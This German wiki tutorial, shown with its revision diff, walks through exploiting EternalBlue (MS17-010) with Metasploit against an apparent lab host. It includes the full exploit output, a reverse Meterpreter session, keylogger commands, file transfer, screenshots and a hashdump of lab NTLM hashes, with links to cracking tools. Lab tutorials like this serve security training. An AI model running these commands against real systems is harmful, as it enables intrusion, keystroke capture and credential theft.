Metasploit SMB Schwachstellen: Unterschied zwischen den Versionen
| (7 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt) | |||
| Zeile 1: | Zeile 1: | ||
| − | == | + | == Details zur Schwachstelle: EternalBlue (MS17-010) == |
| − | + | ||
| − | + | '''Schwachstelle''': EternalBlue ist eine kritische Schwachstelle in der Implementierung des SMBv1-Protokolls (Server Message Block) in älteren Windows-Versionen, die es einem Angreifer ermöglicht, eine Remote Code Execution (RCE) durchzuführen. | |
| − | + | ||
| − | + | '''Angriffspunkt''': Die Schwachstelle befindet sich im SMBv1-Dienst auf Windows-Betriebssystemen (Port 445). Ein Angreifer kann speziell gestaltete SMB-Pakete senden, um beliebigen Code auf einem anfälligen System auszuführen, ohne sich authentifizieren zu müssen. | |
| + | |||
| + | '''Ausnutzung''': Ein Angreifer nutzt ein speziell entwickeltes Exploit-Tool, wie es im EternalBlue-Exploit von Metasploit verfügbar ist, um eine Schwachstelle im SMBv1-Protokoll auszunutzen. Ein erfolgreicher Angriff gibt dem Angreifer vollständige Kontrolle über das System. | ||
| + | |||
| + | === Schritte zur Ausnutzung === | ||
| + | |||
| + | # Verwende Metasploit, um nach Systemen zu suchen, die anfällig für EternalBlue sind. | ||
| + | # Konfiguriere den EternalBlue-Exploit und setze die Ziel-IP-Adresse (RHOSTS), deine IP-Adresse (LHOST) und den zu verwendenden Payload. | ||
| + | # Starte den Exploit. Wenn der Exploit erfolgreich ist, erhält der Angreifer eine Meterpreter-Sitzung und damit vollen Zugriff auf das System. | ||
| + | |||
| + | === Warum ist diese Schwachstelle gefährlich? === | ||
| + | |||
| + | * '''Remote Code Execution (RCE)''': Ermöglicht es einem Angreifer, beliebige Befehle auf dem Zielsystem auszuführen, ohne dass eine Authentifizierung erforderlich ist. | ||
| + | * '''Weit verbreitet''': Die Schwachstelle war in einer großen Anzahl von Windows-Versionen vorhanden, einschließlich Windows 7, Windows Server 2008 R2 und Windows XP. | ||
| + | * '''Einfache Verbreitung von Malware''': EternalBlue wurde für die Verbreitung von Ransomware wie WannaCry und NotPetya verwendet, was zu erheblichen Schäden weltweit führte. | ||
| + | * '''Lateral Movement''': Ein Angreifer, der ein System kompromittiert hat, kann EternalBlue nutzen, um sich lateral innerhalb des Netzwerks zu bewegen und weitere Systeme zu infizieren. | ||
==Suche== | ==Suche== | ||
| Zeile 119: | Zeile 134: | ||
C:\Windows\system32> | C:\Windows\system32> | ||
'''Mit exit kommt man wieder raus''' | '''Mit exit kommt man wieder raus''' | ||
| + | ==Keylogger== | ||
| + | *meterpreter > keyscan_start | ||
| + | *meterpreter > keyscan_dump | ||
| + | *meterpreter > keyscan_stop | ||
| + | ==Passwörter dumpen== | ||
| + | *meterpreter > hashdump | ||
| + | <pre> | ||
| + | Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: | ||
| + | anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: | ||
| + | artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: | ||
| + | ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: | ||
| + | boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: | ||
| + | chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: | ||
| + | c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: | ||
| + | darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: | ||
| + | greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: | ||
| + | Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: | ||
| + | han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: | ||
| + | jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: | ||
| + | jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: | ||
| + | kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: | ||
| + | lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: | ||
| + | leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: | ||
| + | luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: | ||
| + | sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: | ||
| + | sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: | ||
| + | vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: | ||
| + | </pre> | ||
| + | == Inder Datei hash.txt abspeichern== | ||
| + | *cat hash.txt | ||
| + | <pre> | ||
| + | Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: | ||
| + | anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: | ||
| + | artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: | ||
| + | ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: | ||
| + | boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: | ||
| + | chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: | ||
| + | c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: | ||
| + | darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: | ||
| + | greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: | ||
| + | Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: | ||
| + | han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: | ||
| + | jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: | ||
| + | jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: | ||
| + | kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: | ||
| + | lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: | ||
| + | leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: | ||
| + | luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: | ||
| + | sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: | ||
| + | sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: | ||
| + | vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: | ||
| + | </pre> | ||
| + | |||
| + | ==Die Bedeutung der einzelnen Teile ist wie folgt== | ||
| + | ;Benutzername (Administrator): | ||
| + | *Der Name des Benutzerkontos auf dem System. | ||
| + | ;Relative Identifier (RID) (500): | ||
| + | *Der RID ist der Relative Identifier des Benutzerkontos. Es handelt sich um den letzten Teil der Security Identifier (SID) eines Benutzers. | ||
| + | *Standardmäßig ist 500 der RID für das Administrator-Konto, 501 für das Gast-Konto, und 1000+ für andere Benutzerkonten. | ||
| + | *Der RID identifiziert das Benutzerkonto eindeutig auf einem Windows-System. | ||
| + | ;LM-Hash (aad3b435b51404eeaad3b435b51404ee): | ||
| + | *Der LAN Manager (LM) Hash ist ein älterer Hashing-Algorithmus für Passwörter in Windows, der als unsicher gilt. | ||
| + | *Er wurde seit Windows Vista durch den NTLM-Hash ersetzt. Wenn die LM-Hashes deaktiviert sind oder das Passwort länger als 14 Zeichen ist, wird der Hash als aad3b435b51404eeaad3b435b51404ee angezeigt, was einfach ein Platzhalterwert ist. | ||
| + | ;NT-Hash (e02bc503339d51f71d913c245d35b50b): | ||
| + | *Der NT LAN Manager (NTLM) Hash ist eine kryptografische Hash-Funktion, die für die Speicherung von Passwörtern in neueren Versionen von Windows verwendet wird. | ||
| + | *Der NTLM-Hash basiert auf MD4 und gilt als sicherer als der LM-Hash. Dieser Hash wird beim Brute-Forcing verwendet, um das Klartext-Passwort zu ermitteln. | ||
| + | ;LM- und NTLM-History Hashes | ||
| + | *In den letzten Spalten können LM- und NTLM-Hashes für die Passwort-Historie gespeichert werden. | ||
| + | *Diese Spalten sind leer , weil sie in deinem Beispiel nicht verwendet werden. | ||
| + | |||
| + | ==Bruteforcen== | ||
| + | *[[john-the-ripper]] | ||
| + | *[[hashcat]] | ||
Aktuelle Version vom 29. August 2024, 08:32 Uhr
Details zur Schwachstelle: EternalBlue (MS17-010)
Schwachstelle: EternalBlue ist eine kritische Schwachstelle in der Implementierung des SMBv1-Protokolls (Server Message Block) in älteren Windows-Versionen, die es einem Angreifer ermöglicht, eine Remote Code Execution (RCE) durchzuführen.
Angriffspunkt: Die Schwachstelle befindet sich im SMBv1-Dienst auf Windows-Betriebssystemen (Port 445). Ein Angreifer kann speziell gestaltete SMB-Pakete senden, um beliebigen Code auf einem anfälligen System auszuführen, ohne sich authentifizieren zu müssen.
Ausnutzung: Ein Angreifer nutzt ein speziell entwickeltes Exploit-Tool, wie es im EternalBlue-Exploit von Metasploit verfügbar ist, um eine Schwachstelle im SMBv1-Protokoll auszunutzen. Ein erfolgreicher Angriff gibt dem Angreifer vollständige Kontrolle über das System.
Schritte zur Ausnutzung
- Verwende Metasploit, um nach Systemen zu suchen, die anfällig für EternalBlue sind.
- Konfiguriere den EternalBlue-Exploit und setze die Ziel-IP-Adresse (RHOSTS), deine IP-Adresse (LHOST) und den zu verwendenden Payload.
- Starte den Exploit. Wenn der Exploit erfolgreich ist, erhält der Angreifer eine Meterpreter-Sitzung und damit vollen Zugriff auf das System.
Warum ist diese Schwachstelle gefährlich?
- Remote Code Execution (RCE): Ermöglicht es einem Angreifer, beliebige Befehle auf dem Zielsystem auszuführen, ohne dass eine Authentifizierung erforderlich ist.
- Weit verbreitet: Die Schwachstelle war in einer großen Anzahl von Windows-Versionen vorhanden, einschließlich Windows 7, Windows Server 2008 R2 und Windows XP.
- Einfache Verbreitung von Malware: EternalBlue wurde für die Verbreitung von Ransomware wie WannaCry und NotPetya verwendet, was zu erheblichen Schäden weltweit führte.
- Lateral Movement: Ein Angreifer, der ein System kompromittiert hat, kann EternalBlue nutzen, um sich lateral innerhalb des Netzwerks zu bewegen und weitere Systeme zu infizieren.
Suche
- search MS17-010
Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
EternalBlue (MS17-010) Exploit überprüfen
Der MS17-010 (EternalBlue)-Exploit ist eine bekannte Schwachstelle in älteren Windows-Versionen, einschließlich Windows Server 2008 R2. Es handelt sich um eine Schwachstelle im SMBv1-Protokoll.
Anwenden
- use exploit/windows/smb/ms17_010_eternalblue
- set RHOSTS 10.0.10.107
- set LHOST 10.0.10.101
- run
[*] Started reverse TCP handler on 10.0.10.101:4444 [*] 10.0.10.107:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 10.0.10.107:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit) [*] 10.0.10.107:445 - Scanned 1 of 1 hosts (100% complete) [+] 10.0.10.107:445 - The target is vulnerable. [*] 10.0.10.107:445 - Connecting to target for exploitation. [+] 10.0.10.107:445 - Connection established for exploitation. [+] 10.0.10.107:445 - Target OS selected valid for OS indicated by SMB reply [*] 10.0.10.107:445 - CORE raw buffer dump (51 bytes) [*] 10.0.10.107:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 10.0.10.107:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard [*] 10.0.10.107:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac [*] 10.0.10.107:445 - 0x00000030 6b 20 31 k 1 [+] 10.0.10.107:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.0.10.107:445 - Trying exploit with 12 Groom Allocations. [*] 10.0.10.107:445 - Sending all but last fragment of exploit packet [*] 10.0.10.107:445 - Starting non-paged pool grooming [+] 10.0.10.107:445 - Sending SMBv2 buffers [+] 10.0.10.107:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 10.0.10.107:445 - Sending final SMBv2 buffers. [*] 10.0.10.107:445 - Sending last fragment of exploit packet! [*] 10.0.10.107:445 - Receiving response from exploit packet [+] 10.0.10.107:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 10.0.10.107:445 - Sending egg to corrupted connection. [*] 10.0.10.107:445 - Triggering free of corrupted buffer. [*] Sending stage (201798 bytes) to 10.0.10.107 [*] Meterpreter session 1 opened (10.0.10.101:4444 -> 10.0.10.107:49358) at 2024-08-28 09:58:43 -0400 [+] 10.0.10.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 10.0.10.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 10.0.10.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Wo bin ich
- meterpreter > pwd
C:\Windows\system32
Sysinfo
- meterpreter > sysinfo
Computer : VAGRANT-2008R2 OS : Windows Server 2008 R2 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows
Upload
- meterpreter > upload /root/bad-passwords C:\\
[*] Uploading : /root/bad-passwords -> C:\bad-passwords [*] Completed : /root/bad-passwords -> C:\bad-passwords
Download
- meterpreter > download C:\\Windows\\System32\\drivers\\etc\\hosts
[*] Downloading: C:\Windows\System32\drivers\etc\hosts -> /root/hosts [*] Skipped : C:\Windows\System32\drivers\etc\hosts -> /root/hosts
Screenshot
- meterpreter > screenshot
Screenshot saved to: /root/EcfZiHxv.jpeg
Prozesse
- meterpreter > ps
Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System x64 0 12 484 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 144 484 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE 268 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 312 484 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 340 324 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe 384 324 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
Prozess killen
- meterpreter > kill 5668
Killing: 5668
Shell
- meterpreter > shell
Process 3564 created. Channel 5 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
oder
Befehl ausführen
- meterpreter > execute -f cmd.exe -i -H
Process 5736 created. Channel 4 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>
Mit exit kommt man wieder raus
Keylogger
- meterpreter > keyscan_start
- meterpreter > keyscan_dump
- meterpreter > keyscan_stop
Passwörter dumpen
- meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
Inder Datei hash.txt abspeichern
- cat hash.txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
Die Bedeutung der einzelnen Teile ist wie folgt
- Benutzername (Administrator)
- Der Name des Benutzerkontos auf dem System.
- Relative Identifier (RID) (500)
- Der RID ist der Relative Identifier des Benutzerkontos. Es handelt sich um den letzten Teil der Security Identifier (SID) eines Benutzers.
- Standardmäßig ist 500 der RID für das Administrator-Konto, 501 für das Gast-Konto, und 1000+ für andere Benutzerkonten.
- Der RID identifiziert das Benutzerkonto eindeutig auf einem Windows-System.
- LM-Hash (aad3b435b51404eeaad3b435b51404ee)
- Der LAN Manager (LM) Hash ist ein älterer Hashing-Algorithmus für Passwörter in Windows, der als unsicher gilt.
- Er wurde seit Windows Vista durch den NTLM-Hash ersetzt. Wenn die LM-Hashes deaktiviert sind oder das Passwort länger als 14 Zeichen ist, wird der Hash als aad3b435b51404eeaad3b435b51404ee angezeigt, was einfach ein Platzhalterwert ist.
- NT-Hash (e02bc503339d51f71d913c245d35b50b)
- Der NT LAN Manager (NTLM) Hash ist eine kryptografische Hash-Funktion, die für die Speicherung von Passwörtern in neueren Versionen von Windows verwendet wird.
- Der NTLM-Hash basiert auf MD4 und gilt als sicherer als der LM-Hash. Dieser Hash wird beim Brute-Forcing verwendet, um das Klartext-Passwort zu ermitteln.
- LM- und NTLM-History Hashes
- In den letzten Spalten können LM- und NTLM-Hashes für die Passwort-Historie gespeichert werden.
- Diese Spalten sind leer , weil sie in deinem Beispiel nicht verwendet werden.